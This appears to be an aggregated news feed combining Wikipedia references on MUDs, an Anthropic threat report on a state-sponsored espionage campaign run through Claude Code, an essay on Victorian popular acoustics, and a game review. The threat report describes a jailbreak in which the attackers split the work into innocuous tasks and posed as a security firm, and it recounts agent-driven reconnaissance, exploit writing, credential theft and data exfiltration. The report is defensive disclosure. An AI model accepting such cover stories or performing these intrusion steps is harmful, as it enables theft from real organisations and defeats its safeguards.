  76. ^ Dobson, James (May 3, 2007). "Q&A: Behind RuneScape's 1 Million Subscriber Success" . Gamasutra . Archived from the original on May 6, 2010 . Retrieved April 24, 2010 . When I went to university, I discovered text-based MUDs, or multi-user dungeons. I loved the fact that these sorts of games had all these players playing at once - even when you were not playing, the world carried on without you. Because of this, I began creating my own text-based MUD, but I quickly realized that with so many of them out there, there was no way that mine would ever get noticed. So I began to search for a way to make mine stand out, and the obvious way, of course, was to add graphics. With my game, I was trying to emulate text MUDs at the time, purely as a hobby.
  77. ^ Funk, John (July 23, 2008). "WarCry and Jagex Talk RuneScape" . WarCry Network. Archived from the original on July 28, 2011 . Retrieved January 6, 2009 . Olifiers began with a brief history of Jagex and RuneScape: how Lead Developer Andrew Gower and his brother Paul founded the company in Cambridge in 2001, bringing their love for classic MUDs into the visual realm. The original RuneScape (now referred to as RuneScape Classic) was simply and exactly that: a 2D graphical interface placed on top of a MUD
  78. ^ Safko, Ron; Brake, David (2009). The Social Media Bible: Tactics, Tools, and Strategies for Business Success . Wiley. ISBN 978-0-470-41155-1 . Richard Garriott first coined the term MMORPG in 1997.
  79. ^ Bartle 2003 , p. 43, "Above this layer is what (for historical reasons) is known as the mudlib 58 . [...] 58 For "mud library". MUD1 had a mudlib, but it was an adaptation of the BCPL input/output library and therefore was at a lower level than today's mudlibs. The modern usage of the term was coined independently by LPMUD ."
  80. ^ Busey 1995 , p. 239, " MUDLib is short for MUD library . ... Files within a MUDLib are akin to books on the shelves of a library."
  81. ^ Bartle 2003 , p. 43, "The mudlib defines the physics of a virtual world, which will include things such as mass/weight, timers, movement and communication, along with higher concepts such as (in a game context) magic and combat mechanisms."
  82. ^ Reese, George (March 11, 1996). "LPMud Timeline" . Archived from the original on February 26, 2012 . Retrieved April 18, 2010 . Late 1991 ¶ After the retirement of Lars from _Genesis_, the _Genesis_ admins move to create the first LPMud-derived server, CD. CD stands for Chalmers Datorforening, Swedish for Chalmers Computing Club, where _Genesis_ and _Igor_ existed. In spite of his retirement from _Genesis_, Lars continued to develop LPMud.
  83. ^ "Full Lima Bundle Released" . lpmuds.net . January 24, 2009. Archived from the original on March 12, 2016 . Retrieved May 17, 2010 .
  84. ^ a b Brennan, Seraphina (January 6, 2009). "MUD history dissolving into the waters of time" . Massively . Archived from the original on April 26, 2016 . Retrieved March 8, 2016 .
  85. ^ Towers, J. Tarin; Badertscher, Ken; Cunningham, Wayne; Buskirk, Laura (1996). Yahoo! Wild Web Rides . IDG Books Worldwide Inc. p. 138. ISBN 978-0-7645-7003-2 . The MUD Connector at http://www.mudconnect.com has just about everything you could possibly need to get on a MUD. It has MUD-related links to FAQs, newsgroups and clients; as well as player discussions and forums about different MUDs. This site also has a listing of over 500 MUDs, with pretty useful descriptions of what you can expect to find on most games. You can even click on the MUD or home page you'd like to see and link right to it. If you're shopping for a new MUD and aren't sure what you're looking for, this is the place to park it. We're talking big time bookmark material here.
  86. ^ Pantuso, Joe (1996). The Complete Internet Gamer . John Wiley & Sons . p. 115. ISBN 978-0471137870 . The Mud Connector has, at the time of this writing, links to 205 active Muds. The Muds are reviewed periodically, so there are few dead links. What sets this site apart from some of the other Mud link connections listed here is that each link includes the name of the Mud, the kind of code it is based on (nice for developers), the telnet address written out, an active hyperlink to the telnet site and Web home page if one exists, and a short but useful description of the Mud. The list is alphabetized and broken into four sections for easy loading. There are also forms for submitting your Mud to the list. There is even a page for dead links in case you want to see what has gone before.
  87. ^ Condon, William; Butler, Wayne (1997). Writing the Information Superhighway . Longman. pp. 306 . ISBN 978-0205195756 . "The Mud Connector" is a complete on-line service designed to provide the most up-to-date listings of registered Multiuser on-line games. Every entry lists the site of the game, the base code used, descriptions of the game as submitted by the administrators, links to WWW homepages (when available), and Telnet links to the game.
  88. ^ Godlovitch, Ilsa (August 28, 1995). "Jackal takes Dragonfly to be his bride" . The Independent . Retrieved May 2, 2016 .
  89. ^ Bartle, Richard (July 1997). Jacobson, David (ed.). "Hearts, Clubs, Diamonds, Spades: Players Who Suit MUDs" . Journal of Virtual Environments . 1 (1). Archived from the original on October 29, 2007 . Retrieved April 30, 2010 .
  90. ^ Stuart, Keith (July 17, 2007). "MUD, PLATO and the dawn of MMORPGs" . guardian.co.uk . London. Archived from the original on July 6, 2008 . Retrieved July 8, 2008 .
  91. ^ Towell, John; Towell, Elizabeth (1997). "Presence in Text-Based Networked Virtual Environments or "MUDS" " . Presence . 6 (5): 590– 595. doi : 10.1162/pres.1997.6.5.590 . S2CID 46020475 . Archived from the original on May 18, 2013 . Retrieved May 2, 2010 .
  92. ^ Hahn, Harley (1996). The Internet Complete Reference (2nd ed.). Osborne McGraw-Hill. pp. 553 . ISBN 978-0-07-882138-7 . The word "mud" is also used as a verb. For example, you might hear someone say, "I like to mud more than I like to sleep," or "I am a bit tired, as I was up all night mudding, so maybe you better go to class without me".
  93. ^ Ito, Mizuko (1997). "Virtually Embodied: The Reality of Fantasy in a Multi-User Dungeon". In Porter, David (ed.). Internet Culture (pbk. ed.). Routledge. p. 93. ISBN 978-0-415-91684-4 . Often MUD users (or MUDders, as they call themselves) [...]
  94. ^ Chester, Chris (May 5, 2008). "Curing mudflation before it starts" . Engadget . Archived from the original on November 27, 2019 . Retrieved November 27, 2019 .

Nation state threat actor used Claude Code to orchestrate cyber attacks

Lobsters
www.anthropic.com
2025-11-14 06:54:12
Comments...
Original Article

We recently argued that an inflection point had been reached in cybersecurity: a point at which AI models had become genuinely useful for cybersecurity operations, both for good and for ill. This was based on systematic evaluations showing cyber capabilities doubling in six months; we’d also been tracking real-world cyberattacks, observing how malicious actors were using AI capabilities. While we predicted these capabilities would continue to evolve, what has stood out to us is how quickly they have done so at scale.

In mid-September 2025, we detected suspicious activity that later investigation determined to be a highly sophisticated espionage campaign. The attackers used AI’s “agentic” capabilities to an unprecedented degree—using AI not just as an advisor, but to execute the cyberattacks themselves.

The threat actor—whom we assess with high confidence was a Chinese state-sponsored group—manipulated our Claude Code tool into attempting infiltration into roughly thirty global targets and succeeded in a small number of cases. The operation targeted large tech companies, financial institutions, chemical manufacturing companies, and government agencies. We believe this is the first documented case of a large-scale cyberattack executed without substantial human intervention.

Upon detecting this activity, we immediately launched an investigation to understand its scope and nature. Over the following ten days, as we mapped the severity and full extent of the operation, we banned accounts as they were identified, notified affected entities as appropriate, and coordinated with authorities as we gathered actionable intelligence.

This campaign has substantial implications for cybersecurity in the age of AI “agents”—systems that can be run autonomously for long periods of time and that complete complex tasks largely independent of human intervention. Agents are valuable for everyday work and productivity—but in the wrong hands, they can substantially increase the viability of large-scale cyberattacks.

These attacks are likely to only grow in their effectiveness. To keep pace with this rapidly-advancing threat, we’ve expanded our detection capabilities and developed better classifiers to flag malicious activity. We’re continually working on new methods of investigating and detecting large-scale, distributed attacks like this one.

In the meantime, we’re sharing this case publicly, to help those in industry, government, and the wider research community strengthen their own cyber defenses. We’ll continue to release reports like this regularly, and be transparent about the threats we find.

Read the full report .

How the cyberattack worked

The attack relied on several features of AI models that did not exist, or were in much more nascent form, just a year ago:

  1. Intelligence. Models’ general levels of capability have increased to the point that they can follow complex instructions and understand context in ways that make very sophisticated tasks possible. Not only that, but several of their well-developed specific skills—in particular, software coding—lend themselves to being used in cyberattacks.
  2. Agency . Models can act as agents—that is, they can run in loops where they take autonomous actions, chain together tasks, and make decisions with only minimal, occasional human input.
  3. Tools. Models have access to a wide array of software tools (often via the open standard Model Context Protocol ). They can now search the web, retrieve data, and perform many other actions that were previously the sole domain of human operators. In the case of cyberattacks, the tools might include password crackers, network scanners, and other security-related software. (A benign, generic sketch of this agent-plus-tools loop appears just after this list.)
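
For readers unfamiliar with the pattern, here is a deliberately benign, generic sketch of an agentic loop with tool access. The model_call stub and the two tools are invented placeholders; this is not Anthropic's API, not Claude Code, and not the attack framework described in this post. It only illustrates the loop-plus-tools structure that the three developments above make possible.

    # Generic, benign sketch of an "agent loop" with tool access (all invented).
    import datetime

    def get_time(_arg):
        return datetime.datetime.now().isoformat()

    def word_count(text):
        return str(len(text.split()))

    TOOLS = {"get_time": get_time, "word_count": word_count}

    def model_call(history):
        """Stand-in for a real model API: decides the next step from history."""
        if not any(step.startswith("tool:") for step in history):
            return ("use_tool", "get_time", "")          # ask for a tool result
        return ("final", "Done: " + history[-1], None)   # then finish

    def run_agent(task, max_steps=5):
        history = [f"task: {task}"]
        for _ in range(max_steps):                       # the autonomous loop
            kind, a, b = model_call(history)
            if kind == "use_tool":
                result = TOOLS[a](b)                     # execute the chosen tool
                history.append(f"tool: {a} -> {result}")
            else:
                return a
        return "Step limit reached."

    print(run_agent("report the current time"))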

The diagram below shows the different phases of the attack, each of which required all three of the above developments:

The lifecycle of the cyberattack, showing the move from human-led targeting to largely AI-driven attacks using various tools (often via the Model Context Protocol; MCP). At various points during the attack, the AI returns to its human operator for review and further direction.

In Phase 1, the human operators chose the relevant targets (for example, the company or government agency to be infiltrated). They then developed an attack framework—a system built to autonomously compromise a chosen target with little human involvement. This framework used Claude Code as an automated tool to carry out cyber operations.

At this point they had to convince Claude—which is extensively trained to avoid harmful behaviors—to engage in the attack. They did so by jailbreaking it, effectively tricking it into bypassing its guardrails. They broke down their attacks into small, seemingly innocent tasks that Claude would execute without being given the full context of their malicious purpose. They also told Claude that it was an employee of a legitimate cybersecurity firm and was being used in defensive testing.

The attackers then initiated the second phase of the attack, which involved Claude Code inspecting the target organization’s systems and infrastructure and spotting the highest-value databases. Claude was able to perform this reconnaissance in a fraction of the time it would’ve taken a team of human hackers. It then reported back to the human operators with a summary of its findings.

In the next phases of the attack, Claude identified and tested security vulnerabilities in the target organizations’ systems by researching and writing its own exploit code. Having done so, the framework was able to use Claude to harvest credentials (usernames and passwords) that allowed it further access and then extract a large amount of private data, which it categorized according to its intelligence value. The highest-privilege accounts were identified, backdoors were created, and data were exfiltrated with minimal human supervision.

In a final phase, the attackers had Claude produce comprehensive documentation of the attack, creating helpful files of the stolen credentials and the systems analyzed, which would assist the framework in planning the next stage of the threat actor’s cyber operations.

Overall, the threat actor was able to use AI to perform 80-90% of the campaign, with human intervention required only sporadically (perhaps 4-6 critical decision points per hacking campaign). The sheer amount of work performed by the AI would have taken vast amounts of time for a human team. At the peak of its attack, the AI made thousands of requests, often multiple per second—an attack speed that would have been, for human hackers, simply impossible to match.

Claude didn’t always work perfectly. It occasionally hallucinated credentials or claimed to have extracted secret information that was in fact publicly-available. This remains an obstacle to fully autonomous cyberattacks.

Cybersecurity implications

The barriers to performing sophisticated cyberattacks have dropped substantially—and we predict that they’ll continue to do so. With the correct setup, threat actors can now use agentic AI systems for extended periods to do the work of entire teams of experienced hackers: analyzing target systems, producing exploit code, and scanning vast datasets of stolen information more efficiently than any human operator. Less experienced and resourced groups can now potentially perform large-scale attacks of this nature.

This attack is an escalation even on the “vibe hacking” findings we reported this summer : in those operations, humans were very much still in the loop, directing the operations. Here, human involvement was much less frequent, despite the larger scale of the attack. And although we only have visibility into Claude usage, this case study probably reflects consistent patterns of behavior across frontier AI models and demonstrates how threat actors are adapting their operations to exploit today’s most advanced AI capabilities.

This raises an important question: if AI models can be misused for cyberattacks at this scale, why continue to develop and release them? The answer is that the very abilities that allow Claude to be used in these attacks also make it crucial for cyber defense. When sophisticated cyberattacks inevitably occur, our goal is for Claude—into which we’ve built strong safeguards—to assist cybersecurity professionals to detect, disrupt, and prepare for future versions of the attack. Indeed, our Threat Intelligence team used Claude extensively in analyzing the enormous amounts of data generated during this very investigation.

A fundamental change has occurred in cybersecurity. We advise security teams to experiment with applying AI for defense in areas like Security Operations Center automation, threat detection, vulnerability assessment, and incident response. We also advise developers to continue to invest in safeguards across their AI platforms, to prevent adversarial misuse. The techniques described above will doubtless be used by many more attackers—which makes industry threat sharing, improved detection methods, and stronger safety controls all the more critical.

Read the full report.

Edited November 14 2025:

  • Added an additional hyperlink to the full report in the initial section
  • Corrected an error about the speed of the attack: not "thousands of requests per second" but "thousands of requests, often multiple per second"

Hooked on Sonics: Experimenting with Sound in 19th-Century Popular Science

Hacker News
publicdomainreview.org
2025-11-14 06:13:09
Comments...
Original Article

Of all the senses cultivated throughout the 19th century, it was the sense of hearing that experienced the most dramatic transformation, as the science of sound underwent rapid advancement. Lucas Thompson delves into a particular genre of popular acoustics primers aimed at children and amateurs alike, which reveal the pedagogical, ludic, and transcendental strivings of Victorian society.

Published

October 23, 2025


An experiment demonstrating the reflection of sonic vibrations, from Alfred Marshall Mayer’s Sound: A Series of Simple, Entertaining, and Inexpensive Experiments in the Phenomena of Sound (1879) — Source .

In 1777, the German physicist Ernst Chladni, who would later be crowned the Father of Acoustics, designed an experiment that revolutionized our understanding of sound. After placing grains of sand on a thin metal plate and drawing a violin bow along one edge, Chladni watched in wonder as the sand danced and jiggled into surprising shapes — all perfectly even and symmetrical, but changing their formations depending on how the bow was used. In their beauty and complexity, these shapes (which the physicist himself cannily called “Chladni figures”) seemed to be arranged by invisible hands. In one simple and elegant experiment, sound had become visible. 1

Here at last was clear proof that sound was not produced by generating tiny particles of matter within air, as the dominant theorists of the seventeenth and eighteenth centuries had insisted, but was instead the result of vibrations from waves. While earlier claims about the wave-like properties of sound (which in fact date back to Aristotle’s Physics ) had fallen mostly on deaf ears, Chladni’s experiment provided undeniable evidence that sound was caused by waves that could move through both air and matter.

Chladni’s ingenious demonstration also showed that sound could be observed in a variety of new ways, and would no longer be consigned to the invisible aether. Moreover, it was an easy experiment to replicate for anyone who could get their hands on a copper plate, a violin bow, and some sand. In fact, it was so widely reproduced that, in 1901, Annie Besant and Charles Leadbeater, in their wonderful (and completely bizarre) theosophical study Thought-Forms, could write that Chladni figures were “already familiar to every student of acoustics”, being “continually reproduced in every physical laboratory”. 2


Diagram of Chladni’s figures from Entdeckungen über die Theorie des Klanges (Discoveries in the theory of sound, 1787) — Source .


Illustration of Chladni’s technique for producing his figures, from John Tyndall’s Sound (1869) — Source .

The students of acoustics Besant and Leadbeater had in mind were educated through a vast collection of primers, textbooks, and popular introductions to science that were widely read across the nineteenth century. Despite being little known today, such texts were part of an important wave of science popularization, whose authors, according to the historian Bernard Lightman, “saw themselves as providing both entertainment and instruction to their readers”. 3 Written for a growing middle-class audience, such books and periodicals gave detailed descriptions of groundbreaking experiments, encouraging readers to imagine their own homes as sites of scientific discovery and playful experimentation. Genuine learning and rich enjoyment, these books proclaimed, could be had within the home, and any reader with patience, curiosity, and some basic equipment could follow along with the latest scientific revelations.

In fact, even children could do so, and the experiments in these books were democratically pitched to the whole family. Although they ranged over many scientific disciplines — including chemistry, optics, physics, magnetism, and astronomy — it is their presentation of the emerging subfield of acoustics that is particularly intriguing, since it reveals many facets of nineteenth-century culture. These books speak to a widespread amateur fascination with science and reveal a desire to initiate even the very young into a world of intellectual discovery and delight. In doing so, they set forth a new model of learning — based on play, beauty, and pleasure — that anticipates many later approaches to education. These popularizing books also offer a vision of science that has now largely been forgotten. While, in our own time, scientific understanding is usually thought of in terms of detachment and objectivity, here beauty and knowledge were often intertwined. Finally, and perhaps most unexpectedly, these books prompted readers to reflect on questions of spirituality and transcendence, since they positioned the science of acoustics as a fresh avenue for moving beyond the material plane.


A figure copied from Ernst Heinrich Weber and Wilhelm Eduard Weber’s Wellenlehre auf Experimente gegründet (Wave theory based on experiments, 1825) demonstrating “the chasing produced by water-waves in a circular vessel”, from John Tyndall’s Sound (1869) — Source .

The Century of Sound

These sonic experiments reflected new listening practices and new theories of sound that unfolded across the nineteenth century. It is a century that has been described by the literary critic John Picker as the “auscultative age”, extending the term that René Laennec coined for the invention of his stethoscope to describe the Victorians’ “careful listening to a world at large — and in flux”. 4 The century also saw the birth of technologies designed to amplify, transmit, and record sound — the self-performing player piano, the phonograph, telephone, and radio, for instance. Of all the senses that the Victorians cultivated, it was the sense of hearing that experienced the most dramatic transformation. The Victorians, according to Jonathan Sterne, underwent what he terms “ensoniment”: an acoustic Enlightenment. 5

Part of this transformation included a new understanding of children’s sensitivity to sound. In his 1878 essay “Child’s Play”, Robert Louis Stevenson argued that children’s hearing is far more acute and developed than their other senses. He suggests that while children “have no great faculty for looking” (since “they do not use their eyes for the pleasure of using them, but for by-ends of their own”) and have a “sense of touch” that is not “so clean and poignant . . . as it is in a man”, both their hearing and their sense of smell are superior, being “more developed” than those of their elders. But Stevenson was also convinced that the child’s naturally superior hearing could be further cultivated. For all the freshness of sound to a child, he wrote, “hearing is capable of vast improvement as a means of pleasure; and there is all the world between gaping wonderment at the jargon of birds, and the emotion with which a man listens to articulate music.” 6 The writers of these popular books of science for children may well have shared Stevenson’s conviction: they, too, wanted to educate the ears and minds of young readers, allowing them to experience and understand sound with greater precision and sensitivity.


Coloured engraving of acoustical illustrations by John Emslie, from James Reynolds’ Illustrations of Natural Philosophy (1850) — Source .

Middle-class families of this era often read aloud to one another from novels, poetry collections, newspapers, and periodicals — that is, even printed texts were very often experienced sonically, suggesting yet another everyday aspect of Victorian listening. But the long evenings of the pre-electric nineteenth century also allowed ample time for other pursuits, including amateur science. The authors of these books stressed that their experiments could be carried out by the entire family, and even the smallest children need not miss out on the fun.

Playful Discovery

And there was indeed fun to be had. Clearly, part of the appeal of these experiments was in their sheer entertainment value. These books often use the language of “scientific amusements”, “scientific recreations”, and even scientific “parlour magic” to stress how diverting and delightful science could be. A young child might easily create intricate “acoustic curves” with the help of a basic pendulum, or construct a small siren that allowed for instructive observations on differences in pitch. The books contained advice for finding and listening to various kinds of harmonics, vibrating cords, and for observing sounds being reflected by small flames. Even a very simple experiment, such as swinging a whistle around on a string at various speeds, could yield valuable knowledge about vibration and frequency.


Cover of Arabella Burton Buckley’s The Fairy-Land of Science (1883), a collection of ten scientific lectures delivered to children in 1878 — Source .


Cover and spine of John Henry Pepper’s The Boy’s Playbook of Science (ca. 1880 edition), featuring aeronauts and will-o'-the-wisp — Source .

Arabella Buckley’s whimsical Fairy-Land of Science (1879), for instance, encourages children to experiment with all manner of scientific principles, and her chapter “The Voices of Nature and How We Hear Them” included details of many intriguing sonic demonstrations. At one point, she instructs her readers to “take a poker and tie a piece of string to it, and holding the ends of the string to your ears, strike the poker against the fender.” 7 After noting the way the sound travelled through the string, she then invites children to hold the string in their teeth and block their ears, demonstrating the power of bone to conduct sound waves in a simple — but surely unforgettable — experiment. Elsewhere, she explains how birds produce such complexly beautiful trills and calls, and explores other miracles of the natural world. Like many popular science writers of the era, she encourages her young readers to poke around in their own ear to investigate its features: “Put your finger round your ear and feel how the gristly part is curved towards the front of your head”, Buckley writes. “This concha makes a curve much like the curve a deaf man makes with his hand behind his ear to catch the sound.” 8 By following her lead, anyone could acquire anatomical as well as acoustic knowledge.

Written in the same spirit of playful discovery, John Henry Pepper’s The Boys’ Playbook of Science (1860) and Scientific Amusements for Young People (1861) offer countless experiments and demonstrations of acoustic principles, as does Light Science for Leisure Hours (1871) by Richard Proctor. Other books, such as William Henry Stone’s Elementary Lessons on Sound (1879), Worthington Hooker’s Science for the School and Family (1863), and Rodolphe Radau’s Wonders of Acoustics (1870) emphasize sonic curiosities from history and the natural world, such as the ancient Horn of Alexander (which could reportedly be heard at a distance of many miles) and the complex interaction of echoes with rock formations. Many of these popular science books include detailed illustrations ( The Boys’ Playbook , for instance, boasted of 470 engravings) showing either disembodied hands or well-dressed Victorian youths carrying out different experiments. 9


Illustration of The Horn of Alexander, which supposedly allowed the king to summon his soldiers from a distance of ten or more miles, from Rodolphe Radau’s Wonders of Acoustics (1870), revised in English by Robert Ball — Source .


Demonstration of the interference of sonorous vibrations, from Alfred Marshall Mayer’s Sound (1879) — Source .


Illustration of “the squeaking toy” used in a jar of hydrogen, from John Henry Pepper’s The Boy’s Playbook of Science (1881 edition) — Source .


Illustration of a practical demonstration for the transmission of sound, from John Tyndall’s Sound (1869) — Source .

Luminous Flowers and Talking Machines

One of the most compelling of all the nineteenth-century books that popularized acoustics is Alfred Marshall Mayer’s Sound: A Series of Simple, Entertaining, and Inexpensive Experiments in the Phenomena of Sound, for the Use of Students of Every Age , from 1879. A professor of physics at the Stevens Institute of Technology in New Jersey, Mayer made important contributions to astronomy, optics, and acoustics, and wrote several books for the public that translated important scientific discoveries into language that any interested observer could follow. Like many other popular science writers before him, he was careful to centre his book (as its subtitle suggests) around “simple, entertaining, and inexpensive experiments”. Mayer tells his young readers that for the relatively low outlay of “just $27.50” (around £670 or $894 in today’s currency), they, too, can have a working laboratory for the investigation of acoustics, with the capacity not merely to replicate the demonstrations described in Sound , but to invent instructive experiments of their own.

Mayer patiently introduces children to many of the cutting-edge principles and theories of sound that were circulating in the late nineteenth century, covering topics such as reflection, transmission, vibration, and velocity, along with many newly discovered techniques for rendering sound visible, among them the ubiquitous Chladni figures. But in addition to imparting scientific knowledge, it is striking to note how many of these demonstrations are described in aesthetic terms, as being “beautiful”, “lovely”, or “harmonious”. Mayer clearly perceived both aesthetic and intellectual value in his experiments, and he encouraged his young readers to do the same. After one involving a pendulum that registered the vibrations of different musical intervals, for instance, Mayer advised them to frame the curves produced by the pendulum by fixing them onto glass, which will both “make beautiful ornaments for the window or mantel, and will remind you that you are becoming an experimenter”. Another “very beautiful and striking experiment” involved sprinkling silica powder into a wooden whistle, while elsewhere he describes the pleasure of discovering “beautiful little luminous flowers, like forget-me-nots” that are produced by a singing cone piped directly into a König’s flame. 10 While science in the twenty-first century is often regarded as a dispassionate and purely rational endeavour, in these books beauty and scientific knowledge go hand in hand.


Illustration of “König’s Vibrating Flame”, from Alfred Marshall Mayer’s Sound (1879) — Source .


Illustrations of the vibrations of a flame when effected by different frequencies of vibration (produced by singing vowels at different pitches), from Alfred Marshall Mayer’s Sound (1879) — Source .

It is hard to know what age group Mayer imagined himself to be addressing. Some of the simpler experiments could be carried out by young children (perhaps with adult supervision), such as the construction of a so-called “talking machine” from an orange with a peanut nose, black bean eyes, and completed (in a slightly unsettling touch) with a “baby’s cap”. By puffing air through a small tube, and carefully controlling the “mouth” aperture, a highly realistic imitation of a baby’s “ Mama! ” could be achieved. (The accompanying line drawing bears an uncanny resemblance to Sesame Street ’s Grover.) Others are considerably more complex, and would surely require the dexterity and understanding of a teenager. (Several of the illustrations feature a youth of somewhere between ten and fifteen years, neatly dressed in a blazer, tie, and striped trousers.) It must be said, too, that many of Mayer’s experiments and demonstrations are highly dangerous. Bunsen burners, heliostats, gas flames of various kinds, fragile glass tubes, and even volatile substances like lycopodium and silica powder are commonly used.


Illustration of a talking machine fashioned from an orange with thick skin, from Alfred Marshall Mayer’s Sound (1879) — Source .


Experiment showing how vibrations are transmitted and reflected, from Alfred Marshall Mayer’s Sound (1879) — Source .

Mayer’s introduction to acoustics is representative of many of the books in this genre, especially in its palpable enthusiasm for scientific discovery. The experiments in all of these popular science books on sound are often pitched to the reader as delightful diversions — entertaining escapes from daily life. Yet as delightful as such experiments were, many of the authors also went to great lengths to stress their educational value. Amateur experimenters were not just acquiring sophisticated party tricks for the sake of amusement, but were also gaining genuine knowledge of acoustic principles. Playing around with different kinds of pendulums, for instance, may well be enjoyable in and of itself, but was also imparting knowledge about sound waves. In the same way, clapping near small flames revealed important principles of sonic reflection, while using whistles and “lamp chimneys” instructed young scientists about the effects of vibrating columns of air. Here in these books was a new vision of what education might be — real knowledge, the authors insisted, might arise naturally from play. Simply by encouraging their natural curiosity, children could be gently nudged in the direction of scientific discovery. To read these books even today is to recapture a childlike thrill in the process of learning.

Such pedagogical principles were far from the norm during the nineteenth century, which largely took a joyless, authoritarian approach to educating the young. The Victorian vision of institutional education was characterized by “harsh and coercive lessons”, writes Elizabeth Gargano, centred on “rote recitations and enforced silence.” 11 Many popular science books of this era stand in stark contrast to such principles, offering a very different vision of education that is based on a harmony between play and learning. Instead of the austere silences of institutional education, such books are alive with sound and show readers precisely how to produce unusual acoustic phenomena. During the early years of the twentieth century, such a vision would be central to many new and radical approaches to educating children, including those of Maria Montessori, Rudolf Steiner, and the Reggio Emilia community. Joy, play, tactile discovery, and self-directed learning were at the heart of such novel ways of learning. The popular scientific books for children that were so successful in the nineteenth century may well have anticipated these later advances in educational theory and practice.


Photograph demonstrating the “cultivation of the Constructive-Play interest”, which leaves no room for “the Destructive-Play tendencies”, from William S. Marten’s Manual Training – Play Problems (1917) — Source .

On the Sonic Plane

It is clear that these scientific instructionals reveal much about Victorian attitudes to science, children, entertainment, and learning. But there is another intriguing dimension to these forgotten texts: their insistence that sound itself, when properly understood, can allow for mysterious experiences of transcendence and spiritual communion. Many of these authors understood hearing as an inherently spiritual sense, an intuition that animated many other reverential and quasi-mystical conceptions of sound that were advanced across the nineteenth century. They stressed the “mysterious” and “angelic” properties of sound waves, telling young readers of the unearthly ways in which they interact with the human ear. It is no accident that several books (such as Buckley’s) invoke a realm of fairies and magic, and encourage new ways of perceiving and attending to the sensory world.

For many scientific writers, sound itself was part of a divine, ethereal realm that had only recently, through experimental science, drawn slightly closer. Something about sound itself readily moved the Victorian mind in a spiritual direction. Whether the grains of sand in Chladni’s experiment that seemed to be moved by unseen hands, or the mysterious forces that seemed to be channeled in other demonstrations, sound itself stood in for powerful forces of other kinds. Now that sound could be seen, perhaps other once-invisible energies might also reveal themselves. It is not too much of a leap from thinking about the effect of sound waves on matter to that of spirit on matter. In this way, the newly discovered visibility of sound in the Victorian age has obvious parallels with the Christian doctrine of the Incarnation: here, too, albeit on a far smaller and more manageable scale, a once-distant and invisible force was given physical form. The fact that spiritualism and theosophy were first becoming popular and widely practiced during this period also testifies to a broader interest in the ethereal realm. And since many artistic practices and new technologies were quickly pressed into the service of exploring such a realm, it is no surprise that science was too.


“Music of Gounod”, from Annie Besant and Charles Leadbeater’s Thought-Forms (1901) — Source .


“Music of Mendelssohn”, from Annie Besant and Charles Leadbeater’s Thought-Forms (1901) — Source .


“The Invisible Woman”, from Rodolphe Radau’s Wonders of Acoustics (1870) — Source .

The newly discovered materiality of sound prompted many strange claims about its spiritual power: in 1837, Charles Babbage famously declared that “The air itself is one vast library on whose pages are forever written all that man has ever said or woman whispered” — a cosmic vision of all speech and sound as being potentially retrievable. The Victorians speculated that modern acoustic science might well be bringing lost or once-hidden realms nearer, such that we might someday be able to hear “the grass grow and the squirrel’s heart beat”, as the narrator of George Eliot’s Middlemarch (1872) imagines. 12 It is telling, too, that the authors of popular books on acoustics often wrote with an air of initiating the young into a world of profound mystery, as though imparting great and secret knowledge. In Sound and Music (1879), the Reverend J. A. Zahm even included a poem that stresses the spiritual significance of sound, writing of God’s voice at the moment of creation moving through “soundless realms of space” and setting in motion a world that is now “vibrant”, containing shadowy whispers of “choral raptures grand” that resound in the heavens. 13 For Zahm at least, exploring sound was a project of spiritual significance, promising illumination far beyond mere scientific knowledge.

Amateur Enthusiasms

Nowadays, the term “pop-science” is often used disapprovingly, as though something important is always lost when genuine scientific research is translated into less nuanced terms that the public can comprehend. But the hard distinction between professional and amateur science in our own era — between expertise and general interest — was not yet fully present in the nineteenth century.

To read these surprising, delightful, and often beautiful popular science books is to be made aware of the enormous gulf that has opened up between professional scientists and the public. As science became increasingly specialized in the twentieth century, the public were no longer able to follow along with new findings, let alone have any hope of reproducing important experiments. It is difficult to imagine an amateur enthusiast at home recreating the latest research on the quantum phenomena of sound, for example, or on the way that spiders “listen” to their surroundings via vibrations in their webs. Of course, contemporary publishers still put out science primers, textbooks, and explainers, but something vital has vanished. The frontier of scientific discovery has receded from view, moving far beyond what non-specialists can comprehend. These nineteenth-century popularizing books arose during a brief period in which even children could somewhat keep pace with scientific advancement. They offer a crucial window into what has been lost, and reveal how new understandings of sound filtered through Victorian culture and beyond.

The text of this essay is published under a CC BY-SA license, see here for details.

Call of Duty: Black Ops 7 review – hallucinogenic romp through dystopia is stupidly pleasurable

Guardian
www.theguardian.com
2025-11-14 06:00:20
Activision; PlayStation 4/5, Xbox, PCWith a deafening onslaught of massive shootout set-pieces in exotic locations, an evolving campaign mode and excellent multiplayer offerings, this maximalist instalment of crazed carnage is a hoot It seems like an anachronism now, in this age of live service “for...
Original Article

It seems like an anachronism now, in this age of live service “forever games”, that the annual release of a new Call of Duty title is still considered a major event. But here is Black Ops 7, a year after its direct predecessor, and another breathless bombard of military shooting action. This time it is set in a dystopian 2035 where a global arms manufacturer named the Guild claims to be the only answer to an apocalyptic new terrorist threat – but are things as clearcut as they seem?

The answer, of course, is a loudly yelled “noooo!” Black Ops is the paranoid, conspiracy-obsessed cousin to the Modern Warfare strand of Call of Duty games, a series inspired by 70s thrillers such as The Parallax View and The China Syndrome, and infused with ’Nam era concerns about rogue CIA agents and bizarre psy-ops. The campaign mode, which represents just a quarter of the offering this year, is a hallucinogenic romp through socio-political talking points such as psychopathic corporations, hybrid warfare, robotics and tech oligarchies. The result is a deafening onslaught of massive shootout set-pieces in exotic locations, as the four lead characters – members of a supercharged spec-ops outfit – are exposed to a psychotropic drug that makes them relive their worst nightmares. Luckily, they do so with advanced weaponry, cool gadgets and enough buddy banter to destabilise a medium-sized rogue nation. It is chaotic, relentless and stupidly pleasurable, especially if you play in co-operative mode with three equally irresponsible pals.

In an interesting move, the campaign closes with a new mode, Endgame. It’s a co-op PVE (player v environment) offering inspired by the endgame content of MMO (massively multiplayer online) games such as World of Warcraft, where it’s usually designed to keep people playing even after they’ve levelled up to the max. In the Call of Duty version, groups of players touch down in the fictitious city of Avalon and undertake missions and objectives, such as taking down high value enemies or safely escorting expensive military tech, all within a vast open environment. Along the way, you upgrade your characters and weapons, and publisher Activision says new missions and objectives will be added, likely including public events where different teams can combine forces to take on mega bosses. Time will tell, but for now, it’s a nice way to extend the campaign and prepare us for online play.

Soldiers standing on a city rooftop while drones fly overhead in a screenshot for video game Call of Duty: Black Ops 7.
Future warfare … Call of Duty: Black Ops 7. Photograph: Activision

